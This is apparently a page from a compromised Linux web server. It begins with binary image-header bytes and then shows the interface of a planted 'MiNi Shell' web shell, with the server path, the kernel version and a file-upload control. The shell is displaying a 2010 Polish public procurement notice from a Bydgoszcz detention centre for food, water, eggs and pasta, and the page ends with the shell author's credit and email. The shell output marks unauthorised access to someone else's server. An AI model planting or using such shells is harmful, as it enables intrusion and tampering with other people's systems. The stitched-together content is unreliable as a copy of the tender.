JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101122/378336-N-2010.html

<p class="kh_header"><b>Bydgoszcz: Dostawy artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 378336 - 2010; data zamieszczenia: 22.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Wały Jagiellońskie 4, 85-128 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 5855252, 5855303, faks 052 5855300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Chrupki kukurydzianne	15821130-9	w ilości około 200  kg
2. Kasza gryczana	15613100-9	w ilości około 100  kg
3. Kasza jęczmienna	15613100-9	w ilości około 4 000  kg
4. Kasza manna	15612100-9	w ilości około 1500  kg
5. Mąka kukurydzianna	15612210-6	w ilości około 50  kg
6. Mąka pszenna	15612100-2	w ilości około 5 000  kg
7. Płatki kukurydzianne	15613311-1	w ilości około 100  kg
8. Płatki owsiane	15613380-5	w ilości około 200  kg
9. Chleb bezglutenowy	15811100-7	w ilości około 100  kg
10. Chleb ryżowy	15821130-9	w ilości około 100  kg
11. Cukier	                     15831000-2	w ilości około 11 000  kg
12. Ryż	                     15614300-8	w ilości około 5 000  kg
13. Cynamon	15872200-3	w ilości około 60 kg  
14. Herbata	                     15863200-7	w ilości około 1 000  kg
15. Kawa zbożowa	15862000-8	w ilości około 1 000  kg
16. Kwasek cytrynowy	15890000-3	w ilości około 50  kg
17. Liść laurowy	15872000-1	w ilości około 40  kg
18. Majeranek	15872300-4	w ilości około 120  kg
19. Majonez	                     15871273-8	w ilości około 800  kg
20. Musztarda	15872150-1	w ilości około 1 000 kg  
21. Papryka suszona	15890000-3	w ilości około 30  kg
22. Pieprz naturalny	15872100-2	w ilości około 150  kg
23. Przyprawa czosnkowa 15871270-7 w ilości około 50 kg  
24. Przyprawa do zup	15871210-9	w ilości około 800 kg 
25. Przyprawa uniwersalna 15871270-7 w ilości około 250 kg  
26. Sól	                     15872400-5	w ilości około 4 000 kg
27. Ziele angielskie	15871270-7	w ilości około 30  kg
28. Ocet	                     15871110-8	w ilości około 400  l
29. Budyń	                     15600000-0	w ilości około 200  kg
30. Bulion warzywny	15891500-5	w ilości około 800 kg  
31. Kisiel	                     15620000-0	w ilości około 300 kg  
32. Mąka ziemniaczana	15620000-0	w ilości około 500  kg
33. Rosół	                     15891100-1	w ilości około 800 kg
34. Sos sałatkowy	15871260-4	w ilości około 40 kg 
35. Zupa barszcz biały	15891400-4	w ilości około 200 kg 
36. Zupa barszcz czerwony 15891400-4 w ilości około 100 kg  
37. Zupa pieczarkowa	15891400-4	w ilości około 300 kg 
38. Zupa żurek	15891400-4	w ilości około 200 kg 
39. Żelatyna	                     15800000-3	w ilości około 50 kg 
40. Flaki sojowe	15890000-3	w ilości około 60 kg  
41. Granulat sojowy	15890000-3	w ilości około 500 kg 
42. Kostka sojowa	15890000-3	w ilości około 200 kg 
43. Kotlety sojowe	15890000-3	w ilości około 600 kg 
44. Mąka sojowa	15890000-3	w ilości około 50 kg
45. Miód naturalny          03142100-9 w ilości około 1 000 kg
46. Miód sztuczny           15831600-8 w ilości około 1 000 kg

Część II:

1. Woda mineralna 1,5l  15981000-8 w ilości około 7 000  szt
2. Woda mineralna 0,5l  15981000-8 w ilości około 3 000  szt

Część III:

1. Jaja	01242000-5	w ilości około 110 000  szt

Część IV:

1. Makaron kolanka	15851100-9	w ilości około 2 500 kg
2. Makaron łazanki	15851100-9	w ilości około 2 500 kg 
3. Makaron nitki	15851100-9	w ilości około 2 500 kg 
4. Makaron świderki	15851100-9	w ilości około 2 500 kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.82.11.30-9, 15.61.31.00-9, 15.61.21.00-9, 15.61.22.10-6, 15.61.21.00-2, 15.61.33.11-1, 15.61.33.80-5, 15.81.11.00-7, 15.82.11.30-9, 15.83.10.00-2, 15.61.43.00-8, 15.87.22.00-3, 15.86.32.00-7, 15.86.20.00-8, 15.89.00.00-3, 15.87.00.00-1, 15.87.23.00-4, 15.87.12.73-8, 15.87.21.50-1, 15.89.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy ul. Wały Jagiellońskie 4, 85-128 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2010 godzina 11:00, miejsce: Areszt Śledczy ul. Wały Jagiellońskie 4, 85-128 Bydgoszcz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rózne artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Chrupki kukurydzianne	w ilości około 200  kg
2. Kasza gryczana	w ilości około 100  kg
3. Kasza jęczmienna	w ilości około 4 000  kg
4. Kasza manna	w ilości około 1500  kg
5. Mąka kukurydzianna	w ilości około 50  kg
6. Mąka pszenna	w ilości około 5 000  kg
7. Płatki kukurydzianne	w ilości około 100  kg
8. Płatki owsiane	w ilości około 200  kg
9. Chleb bezglutenowy	w ilości około 100  kg
10. Chleb ryżowy	 ilości około 100  kg
11. Cukier	w ilości około 11 000  kg
12. Ryż	             w ilości około 5 000  kg
13. Cynamon	w ilości około 60 kg  
14. Herbata	w ilości około 1 000  kg
15. Kawa zbożowa	w ilości około 1 000  kg
16. Kwasek cytrynowy	w ilości około 50  kg
17. Liść laurowy	w ilości około 40  kg
18. Majeranek	w ilości około 120  kg
19. Majonez	w ilości około 800  kg
20. Musztarda	w ilości około 1 000 kg  
21. Papryka suszona	w ilości około 30  kg
22. Pieprz naturalny	w ilości około 150  kg
23. Przyprawa czosnkowa w ilości około 50 kg  
24. Przyprawa do zup	w ilości około 800 kg 
25. Przyprawa uniwersalna w ilości około 250 kg  
26. Sól	             w ilości około 4 000 kg
27. Ziele angielskie	w ilości około 30  kg
28. Ocet	              w ilości około 400  l
29. Budyń	 w ilości około 200  kg
30. Bulion warzywny	w ilości około 800 kg  
31. Kisiel	                  	w ilości około 300 kg  
32. Mąka ziemniaczana	w ilości około 500  kg
33. Rosół	             w ilości około 800 kg
34. Sos sałatkowy	w ilości około 40 kg 
35. Zupa barszcz biały	w ilości około 200 kg 
36. Zupa barszcz czerwony w ilości około 100 kg  
37. Zupa pieczarkowa w ilości około 300 kg 
38. Zupa żurek	w ilości około 200 kg 
39. Żelatyna	w ilości około 50 kg 
40. Flaki sojowe	w ilości około 60 kg  
41. Granulat sojowyw ilości około 500 kg 
42. Kostka sojowa	w ilości około 200 kg 
43. Kotlety sojowe	w ilości około 600 kg 
44. Mąka sojowa	w ilości około 50 kg
45. Miód naturalny   w ilości około 1 000 kg
46. Miód sztuczny w ilości około 1 000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Woda mineralna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda mineralna 1,5l  w ilości około 7 000  szt
Woda mineralna 0,5l  15981000-8 w ilości około 3 000  szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja	w ilości około 110 000  szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.24.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Makaron.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Makaron kolanka		w ilości około 2 500 kg
2. Makaron łazanki		w ilości około 2 500 kg 
3. Makaron nitki		w ilości około 2 500 kg 
4. Makaron świderki	w ilości około 2 500 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com